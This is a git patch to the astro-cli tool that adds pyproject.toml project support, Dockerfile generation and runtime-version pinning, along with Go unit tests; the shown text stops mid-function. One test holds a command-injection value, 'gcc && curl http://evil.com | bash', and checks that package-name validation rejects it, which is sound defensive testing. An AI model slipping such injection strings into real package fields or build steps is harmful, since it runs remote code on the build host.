From 06d03a209eaa553cb105cc3dc8c14ece86f077d7 Mon Sep 17 00:00:00 2001 From: Kaxil Naik Date: Thu, 26 Mar 2026 00:16:35 +0000 Subject: [PATCH] Add pyproject.toml as project definition format MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Replace the Dockerfile-centric project definition with pyproject.toml (PEP 621) for Airflow 3 projects. This aligns with the Python ecosystem, enables the uv-based standalone runtime, and lays the groundwork for multi-target compilation. Parser and detection (airflow/project.go): - ReadProject(), IsPyProject(), DetectProjectFormat(), PinRuntimeVersion() - Detection requires [tool.astro] to avoid false positives from ruff/pytest pyproject.toml files astro dev init --format pyproject: - Scaffolds pyproject.toml projects with no Dockerfile or README.md (requirements.txt and packages.txt are still created) - Resolves airflow-version and runtime-version from the API - Validates: AF3 only, mutual exclusion with --from-template Standalone mode reads pyproject.toml: - Reads versions and dependencies from [tool.astro] and [project] - Falls back to Dockerfile parsing for legacy projects Docker mode generates Dockerfile from pyproject.toml: - GenerateDockerfile() produces FROM + optional apt-get for system packages - EnsureDockerfile() called at build time so pyproject.toml edits are always picked up - Generated file written to .astro/Dockerfile.pyproject (gitignored) - System package names validated against Debian naming rules Runtime version resolution: - runtime-version is optional in pyproject.toml — resolved from airflow-version on first start/build and pinned back to pyproject.toml - Mismatch between airflow-version and runtime-version triggers a warning - Warns users that multiple runtimes exist per Airflow version to prevent accidental upgrades on deploy --- airflow/airflow.go | 32 +++ airflow/airflow_test.go | 66 +++++ airflow/docker.go | 18 +- airflow/docker_image.go | 7 +- airflow/dockerfile_gen.go | 118 +++++++++ 
airflow/dockerfile_gen_test.go | 146 +++++++++++ airflow/include/airflow3/gitignore | 1 + airflow/include/airflow3/pyprojecttoml | 8 + airflow/project.go | 191 ++++++++++++++ airflow/project_test.go | 329 +++++++++++++++++++++++++ airflow/standalone.go | 159 +++++++++--- airflow/standalone_test.go | 119 +++++++++ airflow_versions/airflow_versions.go | 39 +++ cmd/airflow.go | 62 ++++- cmd/airflow_test.go | 86 +++++++ 15 files changed, 1332 insertions(+), 49 deletions(-) create mode 100644 airflow/dockerfile_gen.go create mode 100644 airflow/dockerfile_gen_test.go create mode 100644 airflow/include/airflow3/pyprojecttoml create mode 100644 airflow/project.go create mode 100644 airflow/project_test.go diff --git a/airflow/airflow.go b/airflow/airflow.go index 99e8eb602..21f4754c1 100644 --- a/airflow/airflow.go +++ b/airflow/airflow.go @@ -90,6 +90,9 @@ var ( //go:embed include/airflow3/requirements-client.txt Af3RequirementsTxtClient string + + //go:embed include/airflow3/pyprojecttoml + Af3PyProjectTOML string ) func initDirs(root string, dirs []string) error { @@ -208,6 +211,35 @@ func Init(path, airflowImageName, airflowImageTag, template, clientImageTag stri return nil } +// InitPyProject scaffolds a new Airflow project using pyproject.toml as the +// project definition instead of a Dockerfile. Only supported for Airflow 3. 
+func InitPyProject(path, projectName, airflowVersion, runtimeVersion, pythonVersion string) error { + dirs := []string{"dags", "plugins", "include"} + if err := initDirs(path, dirs); err != nil { + return errors.Wrap(err, "failed to create project directories") + } + + files := map[string]string{ + "pyproject.toml": fmt.Sprintf(Af3PyProjectTOML, projectName, pythonVersion, airflowVersion, runtimeVersion), + ".gitignore": Af3Gitignore, + ".dockerignore": Af3Dockerignore, + ".env": "", + "airflow_settings.yaml": Af3Settingsyml, + "packages.txt": "", + "requirements.txt": Af3RequirementsTxt, + "dags/exampledag.py": Af3ExampleDag, + "dags/.airflowignore": "", + "tests/dags/test_dag_example.py": Af3DagExampleTest, + ".astro/test_dag_integrity_default.py": Af3DagIntegrityTestDefault, + ".astro/dag_integrity_exceptions.txt": "# Add dag files to exempt from parse test below. ex: dags/", + } + if err := initFiles(path, files); err != nil { + return errors.Wrap(err, "failed to create project files") + } + + return nil +} + // repositoryName creates an airflow repository name func repositoryName(name string) string { return fmt.Sprintf("%s/%s", name, componentName) diff --git a/airflow/airflow_test.go b/airflow/airflow_test.go index b6cc55072..271d64977 100644 --- a/airflow/airflow_test.go +++ b/airflow/airflow_test.go @@ -172,6 +172,72 @@ func (s *Suite) TestInitWithoutClientImageTag() { } } +func (s *Suite) TestInitPyProject() { + tmpDir, err := os.MkdirTemp("", "temp") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + err = InitPyProject(tmpDir, "my-project", "3.0.1", "3.0-7", "3.12") + s.NoError(err) + + // Files that SHOULD exist + expectedFiles := []string{ + "pyproject.toml", + ".gitignore", + ".env", + "airflow_settings.yaml", + "dags/exampledag.py", + "dags/.airflowignore", + "tests/dags/test_dag_example.py", + ".astro/test_dag_integrity_default.py", + ".astro/dag_integrity_exceptions.txt", + } + for _, file := range expectedFiles { + exist, err := 
fileutil.Exists(filepath.Join(tmpDir, file), nil) + s.NoError(err) + s.True(exist, "Expected file %s to exist", file) + } + + // Files that should NOT exist (Dockerfile-format-specific) + dockerFiles := []string{ + "Dockerfile", + "README.md", + } + for _, file := range dockerFiles { + exist, err := fileutil.Exists(filepath.Join(tmpDir, file), nil) + s.NoError(err) + s.False(exist, "Expected file %s to NOT exist", file) + } + + // Verify pyproject.toml content + content, err := os.ReadFile(filepath.Join(tmpDir, "pyproject.toml")) + s.NoError(err) + s.Contains(string(content), `name = "my-project"`) + s.Contains(string(content), `requires-python = ">=3.12"`) + s.Contains(string(content), `airflow-version = "3.0.1"`) + s.Contains(string(content), `runtime-version = "3.0-7"`) + s.NotContains(string(content), "Dockerfile") +} + +func (s *Suite) TestInitPyProject_CanBeReadBack() { + tmpDir, err := os.MkdirTemp("", "temp") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + err = InitPyProject(tmpDir, "roundtrip-test", "3.0.1", "3.0-7", "3.12") + s.NoError(err) + + // Read it back with our parser from Phase 1 + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("roundtrip-test", proj.Name) + s.Equal(">=3.12", proj.RequiresPython) + s.Equal("3.0.1", proj.AirflowVersion) + s.Equal("3.0-7", proj.RuntimeVersion) + s.Equal("docker", proj.Mode) // default when not specified in template + s.Empty(proj.Dependencies) // empty list in template +} + func (s *Suite) TestTemplateInitFail() { ExtractTemplate = func(templateDir, destDir string) error { err := errors.New("error extracting files") diff --git a/airflow/docker.go b/airflow/docker.go index b895b3d37..0006add79 100644 --- a/airflow/docker.go +++ b/airflow/docker.go @@ -245,6 +245,12 @@ func (d *DockerCompose) Start(opts *airflowTypes.StartOptions) error { envConns := opts.EnvConns useProxy := !opts.NoProxy + // Resolve Dockerfile: for pyproject.toml projects, generate from project definition. 
+ dockerfile, resolveErr := EnsureDockerfile(d.airflowHome, d.dockerfile) + if resolveErr != nil { + return fmt.Errorf("error resolving Dockerfile: %w", resolveErr) + } + // Build this project image if imageName == "" { if !config.CFG.DisableAstroRun.GetBool() { @@ -254,7 +260,7 @@ func (d *DockerCompose) Start(opts *airflowTypes.StartOptions) error { fmt.Printf("Adding 'astro-run-dag' package to requirements.txt unsuccessful: %s\nManually add package to requirements.txt", err.Error()) } } - imageBuildErr := d.imageHandler.Build(d.dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{Path: d.airflowHome, NoCache: noCache}) + imageBuildErr := d.imageHandler.Build(dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{Path: d.airflowHome, NoCache: noCache}) if !config.CFG.DisableAstroRun.GetBool() { // remove astro-run-dag from requirments.txt err := fileutil.RemoveLineFromFile("./requirements.txt", "astro-run-dag", " # This package is needed for the astro run command. It will be removed before a deploy") @@ -1329,8 +1335,14 @@ func (d *DockerCompose) Build(customImageName, buildSecretString string, noCache return d.imageHandler.TagLocalImage(customImageName) } - // Build the image - return d.imageHandler.Build(d.dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{ + // Resolve Dockerfile: for pyproject.toml projects, generate from project definition. + // Done at build time (not init) so changes to pyproject.toml are always picked up. 
+ dockerfile, err := EnsureDockerfile(d.airflowHome, d.dockerfile) + if err != nil { + return fmt.Errorf("error resolving Dockerfile: %w", err) + } + + return d.imageHandler.Build(dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{ Path: d.airflowHome, NoCache: noCache, }) diff --git a/airflow/docker_image.go b/airflow/docker_image.go index 952bd7644..bdb1d9363 100644 --- a/airflow/docker_image.go +++ b/airflow/docker_image.go @@ -99,7 +99,12 @@ func (d *DockerImage) Build(dockerfilePath, buildSecretString string, buildConfi return err } if dockerfilePath == "" { - dockerfilePath = "Dockerfile" + // For pyproject.toml projects, generate a Dockerfile from the project definition. + resolved, resolveErr := EnsureDockerfile(buildConfig.Path, "Dockerfile") + if resolveErr != nil { + return fmt.Errorf("error resolving Dockerfile: %w", resolveErr) + } + dockerfilePath = resolved } args := []string{"build"} addPullFlag, err := shouldAddPullFlag(dockerfilePath) diff --git a/airflow/dockerfile_gen.go b/airflow/dockerfile_gen.go new file mode 100644 index 000000000..521f2610a --- /dev/null +++ b/airflow/dockerfile_gen.go @@ -0,0 +1,118 @@ +package airflow + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + airflowversions "github.com/astronomer/astro-cli/airflow_versions" +) + +const ( + generatedDockerfileComment = "# Auto-generated from pyproject.toml — do not edit.\n# Changes should be made in pyproject.toml.\n" + genDirPerm = os.FileMode(0o755) //nolint:mnd + genFilePerm = os.FileMode(0o644) //nolint:mnd + generatedDockerfileName = "Dockerfile.pyproject" +) + +// validDebPkgRe matches valid Debian package names: starts with alnum, then alnum/./+/- +var validDebPkgRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9.+\-]*$`) + +// GenerateDockerfile produces Dockerfile content from an AstroProject. +// Returns an error if the project has invalid fields. 
+func GenerateDockerfile(project *AstroProject) (string, error) { + if project.RuntimeVersion == "" { + return "", fmt.Errorf("runtime-version is required to generate a Dockerfile") + } + + for _, pkg := range project.SystemPackages { + if !validDebPkgRe.MatchString(pkg) { + return "", fmt.Errorf("invalid system package name %q: must match Debian package naming rules", pkg) + } + } + + var b strings.Builder + + b.WriteString(generatedDockerfileComment) + + imageName := AstroRuntimeAirflow3ImageName + registry := AstroImageRegistryBaseImageName + b.WriteString(fmt.Sprintf("FROM %s/%s:%s\n", registry, imageName, project.RuntimeVersion)) + + if len(project.SystemPackages) > 0 { + b.WriteString("USER root\n") + b.WriteString(fmt.Sprintf( + "RUN apt-get update && apt-get install -y --no-install-recommends %s && rm -rf /var/lib/apt/lists/*\n", + strings.Join(project.SystemPackages, " "), + )) + b.WriteString("USER astro\n") + } + + return b.String(), nil +} + +// EnsureDockerfile checks if the project uses pyproject.toml and generates +// a Dockerfile in .astro/ if needed. Returns the path to the Dockerfile to use +// (either the generated one or the original). +func EnsureDockerfile(airflowHome, originalDockerfile string) (string, error) { + proj, found, err := TryReadProject(airflowHome) + if !found { + return originalDockerfile, nil + } + if err != nil { + return "", fmt.Errorf("error reading pyproject.toml: %w", err) + } + + // If a hand-written Dockerfile exists in the project root, use it instead + // of generating one. This supports users who need custom Docker steps + // beyond what pyproject.toml can express (the "eject" pattern). 
+ dockerfilePath := filepath.Join(airflowHome, "Dockerfile") + if _, err := os.Stat(dockerfilePath); err == nil { + return "Dockerfile", nil + } + + // Resolve runtime-version from airflow-version if missing, and pin it + if proj.RuntimeVersion == "" { + if proj.AirflowVersion == "" { + return "", fmt.Errorf("[tool.astro] requires airflow-version in pyproject.toml") + } + resolved := airflowversions.GetLatestRuntimeForAirflow(proj.AirflowVersion) + if resolved == "" { + return "", fmt.Errorf("could not resolve a runtime version for airflow-version %q", proj.AirflowVersion) + } + fmt.Printf("Resolved runtime-version %q for airflow-version %q (pinning to pyproject.toml)\n", resolved, proj.AirflowVersion) + fmt.Println("Note: one airflow-version may have multiple runtime versions. Pin runtime-version in pyproject.toml to avoid accidental upgrades on deploy.") + if pinErr := PinRuntimeVersion(airflowHome, resolved); pinErr != nil { + fmt.Printf("Warning: could not pin runtime-version to pyproject.toml: %s\n", pinErr) + } + proj.RuntimeVersion = resolved + } + + // Validate airflow-version matches runtime-version + if proj.AirflowVersion != "" { + actual := airflowversions.GetAirflowVersionForRuntime(proj.RuntimeVersion) + if actual != "" && actual != proj.AirflowVersion { + fmt.Printf("Warning: airflow-version %q in pyproject.toml does not match runtime-version %q (which bundles Airflow %s). 
Consider updating airflow-version or runtime-version.\n", + proj.AirflowVersion, proj.RuntimeVersion, actual) + } + } + + content, err := GenerateDockerfile(proj) + if err != nil { + return "", err + } + + genDir := filepath.Join(airflowHome, ".astro") + if err := os.MkdirAll(genDir, genDirPerm); err != nil { + return "", fmt.Errorf("error creating .astro directory: %w", err) + } + + genPath := filepath.Join(genDir, generatedDockerfileName) + if err := os.WriteFile(genPath, []byte(content), genFilePerm); err != nil { + return "", fmt.Errorf("error writing generated Dockerfile: %w", err) + } + + return genPath, nil +} diff --git a/airflow/dockerfile_gen_test.go b/airflow/dockerfile_gen_test.go new file mode 100644 index 000000000..15c78c025 --- /dev/null +++ b/airflow/dockerfile_gen_test.go @@ -0,0 +1,146 @@ +package airflow + +import ( + "os" + "path/filepath" +) + +func (s *Suite) TestGenerateDockerfile_Basic() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(content, "Auto-generated from pyproject.toml") + s.NotContains(content, "apt-get") +} + +func (s *Suite) TestGenerateDockerfile_WithSystemPackages() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: []string{"gcc", "libpq-dev"}, + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(content, "apt-get install -y --no-install-recommends gcc libpq-dev") + s.Contains(content, "rm -rf /var/lib/apt/lists/*") +} + +func (s *Suite) TestGenerateDockerfile_EmptyRuntimeVersion() { + proj := &AstroProject{} + + _, err := GenerateDockerfile(proj) + s.Error(err) + s.Contains(err.Error(), "runtime-version is required") +} + +func (s *Suite) TestGenerateDockerfile_InvalidSystemPackage() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: 
[]string{"gcc && curl http://evil.com | bash"}, + } + + _, err := GenerateDockerfile(proj) + s.Error(err) + s.Contains(err.Error(), "invalid system package name") +} + +func (s *Suite) TestGenerateDockerfile_ValidDebianPackageNames() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: []string{"libpq-dev", "python3.12-dev", "g++", "libc6"}, + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "libpq-dev python3.12-dev g++ libc6") +} + +func (s *Suite) TestEnsureDockerfile_PyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + pyproject := `[project] +name = "test-gen" + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "3.1-14" + +[tool.astro.docker] +system-packages = ["gcc"] +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal(filepath.Join(tmpDir, ".astro", generatedDockerfileName), result) + + content, err := os.ReadFile(result) + s.NoError(err) + s.Contains(string(content), "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(string(content), "gcc") +} + +func (s *Suite) TestEnsureDockerfile_LegacyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal("Dockerfile", result) +} + +func (s *Suite) TestEnsureDockerfile_PyProjectWithHandWrittenDockerfile() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml exists with [tool.astro] + pyproject := `[project] +name = "custom-docker" + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = 
"3.1-14" +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + // Hand-written Dockerfile also exists — should take precedence + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM custom-image:latest\nRUN custom-step"), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal("Dockerfile", result) + + // Generated Dockerfile should NOT exist + _, err = os.Stat(filepath.Join(tmpDir, ".astro", generatedDockerfileName)) + s.True(os.IsNotExist(err)) +} + +func (s *Suite) TestEnsureDockerfile_BrokenPyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml with [tool.astro] but missing airflow-version — should error, not silently fall through + pyproject := `[project] +name = "test-no-versions" + +[tool.astro] +mode = "docker" +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + _, err = EnsureDockerfile(tmpDir, "Dockerfile") + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} diff --git a/airflow/include/airflow3/gitignore b/airflow/include/airflow3/gitignore index 0e8bcca90..2f15a2f45 100644 --- a/airflow/include/airflow3/gitignore +++ b/airflow/include/airflow3/gitignore @@ -9,3 +9,4 @@ airflow-webserver.pid webserver_config.py airflow.cfg airflow.db +.astro/Dockerfile.pyproject diff --git a/airflow/include/airflow3/pyprojecttoml b/airflow/include/airflow3/pyprojecttoml new file mode 100644 index 000000000..66861eda3 --- /dev/null +++ b/airflow/include/airflow3/pyprojecttoml @@ -0,0 +1,8 @@ +[project] +name = "%[1]s" +requires-python = ">=%[2]s" +dependencies = [] + +[tool.astro] +airflow-version = "%[3]s" +runtime-version = "%[4]s" diff --git a/airflow/project.go b/airflow/project.go new file mode 100644 index 000000000..dcf8036c7 --- /dev/null +++ b/airflow/project.go @@ -0,0 +1,191 @@ +package 
airflow + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + toml "github.com/pelletier/go-toml/v2" +) + +const ( + PyProjectFile = "pyproject.toml" + ProjectFormatPy = "pyproject" + ProjectFormatDocker = "dockerfile" + ProjectFormatUnknown = "unknown" + DefaultMode = "docker" + DefaultPythonVersion = "3.12" + ModeStandalone = "standalone" + ModeDocker = "docker" +) + +// pyProjectTOML mirrors the subset of pyproject.toml we care about. +// Used only for reading — PinRuntimeVersion uses targeted text editing +// to avoid destroying user content outside this struct. +type pyProjectTOML struct { + Project struct { + Name string `toml:"name"` + RequiresPython string `toml:"requires-python"` + Dependencies []string `toml:"dependencies"` + } `toml:"project"` + Tool struct { + Astro *astroToolConfig `toml:"astro"` + } `toml:"tool"` +} + +type astroToolConfig struct { + AirflowVersion string `toml:"airflow-version"` + RuntimeVersion string `toml:"runtime-version"` + Mode string `toml:"mode"` + Docker *astroDockerCfg `toml:"docker"` +} + +type astroDockerCfg struct { + SystemPackages []string `toml:"system-packages"` +} + +// AstroProject is the parsed, validated representation of an Astro project +// defined via pyproject.toml. +type AstroProject struct { + Name string + RequiresPython string + Dependencies []string + AirflowVersion string + RuntimeVersion string + Mode string + SystemPackages []string +} + +// ReadProject parses pyproject.toml at the given project root and returns an +// AstroProject. Returns (nil, nil) if no pyproject.toml exists. Returns +// (nil, error) if the file exists but is broken (bad TOML, missing [tool.astro], etc.). +func ReadProject(projectPath string) (*AstroProject, error) { + proj, _, err := TryReadProject(projectPath) + return proj, err +} + +// TryReadProject attempts to read pyproject.toml. Returns (nil, false, nil) if +// no pyproject.toml exists (not an error). 
Returns (nil, true, err) if the file +// exists but is broken. Returns (proj, true, nil) on success. +func TryReadProject(projectPath string) (proj *AstroProject, found bool, err error) { + filePath := filepath.Join(projectPath, PyProjectFile) + + data, err := os.ReadFile(filePath) + if err != nil { + if os.IsNotExist(err) { + return nil, false, nil + } + return nil, true, fmt.Errorf("failed to read %s: %w", PyProjectFile, err) + } + + var raw pyProjectTOML + if unmarshalErr := toml.Unmarshal(data, &raw); unmarshalErr != nil { + return nil, true, fmt.Errorf("failed to parse %s: %w", PyProjectFile, unmarshalErr) + } + + if raw.Tool.Astro == nil { + return nil, true, fmt.Errorf("%s does not contain a [tool.astro] section", PyProjectFile) + } + + astro := raw.Tool.Astro + + if astro.AirflowVersion == "" { + return nil, true, fmt.Errorf("[tool.astro].airflow-version is required in %s", PyProjectFile) + } + + mode := astro.Mode + if mode == "" { + mode = DefaultMode + } + if mode != ModeStandalone && mode != ModeDocker { + return nil, true, fmt.Errorf("[tool.astro].mode must be %q or %q, got %q", ModeStandalone, ModeDocker, mode) + } + + var systemPackages []string + if astro.Docker != nil { + systemPackages = astro.Docker.SystemPackages + } + + return &AstroProject{ + Name: raw.Project.Name, + RequiresPython: raw.Project.RequiresPython, + Dependencies: raw.Project.Dependencies, + AirflowVersion: astro.AirflowVersion, + RuntimeVersion: astro.RuntimeVersion, + Mode: mode, + SystemPackages: systemPackages, + }, true, nil +} + +// IsPyProject returns true if the project at the given path is defined via +// pyproject.toml with a [tool.astro] section. It does not validate the file +// beyond checking for the section's existence. 
+func IsPyProject(projectPath string) bool { + filePath := filepath.Join(projectPath, PyProjectFile) + + data, err := os.ReadFile(filePath) + if err != nil { + return false + } + + var raw pyProjectTOML + if err := toml.Unmarshal(data, &raw); err != nil { + return false + } + + return raw.Tool.Astro != nil +} + +// PinRuntimeVersion sets the runtime-version field in the [tool.astro] +// section of pyproject.toml. Uses targeted text editing (not full TOML +// roundtrip) to preserve all other content — user comments, [tool.ruff], +// [build-system], [[tool.uv.index]], etc. +func PinRuntimeVersion(projectPath, runtimeVersion string) error { + filePath := filepath.Join(projectPath, PyProjectFile) + data, err := os.ReadFile(filePath) + if err != nil { + return fmt.Errorf("failed to read %s: %w", PyProjectFile, err) + } + + content := string(data) + + // Try to replace existing runtime-version line + re := regexp.MustCompile(`(?m)^(\s*)runtime-version\s*=\s*["'][^"']*["']`) + if re.MatchString(content) { + content = re.ReplaceAllStringFunc(content, func(match string) string { + indent := match[:len(match)-len(strings.TrimLeft(match, " \t"))] + return fmt.Sprintf("%sruntime-version = %q", indent, runtimeVersion) + }) + } else { + // Insert after airflow-version line + avRe := regexp.MustCompile(`(?m)(^[ \t]*airflow-version\s*=\s*["'][^"']*["'][ \t]*)$`) + if avRe.MatchString(content) { + content = avRe.ReplaceAllStringFunc(content, func(match string) string { + indent := match[:len(match)-len(strings.TrimLeft(match, " \t"))] + return fmt.Sprintf("%s\n%sruntime-version = %q", match, indent, runtimeVersion) + }) + } else { + return fmt.Errorf("could not find airflow-version in %s to insert runtime-version", PyProjectFile) + } + } + + return os.WriteFile(filePath, []byte(content), 0o644) //nolint:gosec,mnd +} + +// DetectProjectFormat determines the project format at the given path. 
+// Returns ProjectFormatPy if pyproject.toml with [tool.astro] exists, +// ProjectFormatDocker if a Dockerfile exists, or ProjectFormatUnknown. +func DetectProjectFormat(projectPath string) string { + if IsPyProject(projectPath) { + return ProjectFormatPy + } + + dockerfilePath := filepath.Join(projectPath, "Dockerfile") + if _, err := os.Stat(dockerfilePath); err == nil { + return ProjectFormatDocker + } + + return ProjectFormatUnknown +} diff --git a/airflow/project_test.go b/airflow/project_test.go new file mode 100644 index 000000000..27f7c43cd --- /dev/null +++ b/airflow/project_test.go @@ -0,0 +1,329 @@ +package airflow + +import ( + "os" + "path/filepath" +) + +const validPyProject = `[project] +name = "my-airflow-project" +requires-python = ">=3.12" +dependencies = [ + "apache-airflow-providers-snowflake>=5.0", + "pandas>=2.0", +] + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "13.0.0" +mode = "standalone" + +[tool.astro.docker] +system-packages = ["gcc", "libpq-dev"] +` + +const minimalPyProject = `[project] +name = "minimal" + +[tool.astro] +airflow-version = "3.0.1" +` + +const noAstroSection = `[project] +name = "just-ruff" + +[tool.ruff] +line-length = 120 +` + +const invalidMode = `[project] +name = "bad-mode" + +[tool.astro] +airflow-version = "3.0.1" +mode = "kubernetes" +` + +const missingAirflowVersion = `[project] +name = "no-version" + +[tool.astro] +runtime-version = "13.0.0" +` + +// --- ReadProject tests --- + +func (s *Suite) TestReadProject_Valid() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("my-airflow-project", proj.Name) + s.Equal(">=3.12", proj.RequiresPython) + s.Equal([]string{"apache-airflow-providers-snowflake>=5.0", "pandas>=2.0"}, proj.Dependencies) + s.Equal("3.0.1", 
proj.AirflowVersion) + s.Equal("13.0.0", proj.RuntimeVersion) + s.Equal("standalone", proj.Mode) + s.Equal([]string{"gcc", "libpq-dev"}, proj.SystemPackages) +} + +func (s *Suite) TestReadProject_Minimal() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(minimalPyProject), 0o644)) + + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("minimal", proj.Name) + s.Equal("", proj.RequiresPython) + s.Nil(proj.Dependencies) + s.Equal("3.0.1", proj.AirflowVersion) + s.Equal("", proj.RuntimeVersion) + s.Equal("docker", proj.Mode) // default + s.Nil(proj.SystemPackages) +} + +func (s *Suite) TestReadProject_NoAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "[tool.astro]") +} + +func (s *Suite) TestReadProject_InvalidMode() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(invalidMode), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "kubernetes") +} + +func (s *Suite) TestReadProject_MissingAirflowVersion() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(missingAirflowVersion), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} + +func (s *Suite) TestReadProject_FileNotFound() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + proj, err := ReadProject(tmpDir) + 
s.NoError(err) // missing file is not an error — just means not a pyproject project + s.Nil(proj) +} + +func (s *Suite) TestTryReadProject_FileNotFound() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + proj, found, err := TryReadProject(tmpDir) + s.NoError(err) + s.False(found) + s.Nil(proj) +} + +func (s *Suite) TestTryReadProject_BrokenTOML() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte("{{broken"), 0o644)) + + proj, found, err := TryReadProject(tmpDir) + s.True(found) // file exists + s.Error(err) // but is broken + s.Nil(proj) +} + +func (s *Suite) TestReadProject_InvalidTOML() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte("{{invalid toml"), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "failed to parse") +} + +// --- IsPyProject tests --- + +func (s *Suite) TestIsPyProject_WithAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + s.True(IsPyProject(tmpDir)) +} + +func (s *Suite) TestIsPyProject_WithoutAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + + s.False(IsPyProject(tmpDir)) +} + +func (s *Suite) TestIsPyProject_NoFile() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.False(IsPyProject(tmpDir)) +} + +// --- DetectProjectFormat tests --- + +func (s *Suite) 
